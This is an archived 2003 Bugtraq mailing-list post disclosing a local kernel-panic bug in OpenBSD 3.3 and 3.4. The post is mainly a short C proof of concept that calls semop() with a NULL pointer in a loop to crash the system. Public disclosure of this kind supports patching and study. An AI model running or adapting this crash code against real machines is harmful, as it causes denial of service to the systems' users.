yet another panic() in OpenBSD
noir_at_uberhax0r.net
Date: 11/21/03
- Previous message: Thilo Schulz: "Re: [aadams@securityfocus.com: Linux Kernel <= 2.4.21 MXCSR Local DOS Exploitation]"
- Next in thread: Henning Brauer: "Re: yet another panic() in OpenBSD"
- Reply: Henning Brauer: "Re: yet another panic() in OpenBSD"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Fri, 21 Nov 2003 17:46:01 -0500 (EST) To: bugtraq@securityfocus.com
a project lacking the basic QA and unit testing and here is the outcome:
#include <stdio.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/ipc.h>
int
main()
{
int i;
for(i = 0; i < 0x40; i++)
semop(i, (struct sembuf *) NULL, 0);
}
PANIC in OpenBSD 3.3 and 3.4 is confirmed.
- Previous message: Thilo Schulz: "Re: [aadams@securityfocus.com: Linux Kernel <= 2.4.21 MXCSR Local DOS Exploitation]"
- Next in thread: Henning Brauer: "Re: yet another panic() in OpenBSD"
- Reply: Henning Brauer: "Re: yet another panic() in OpenBSD"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|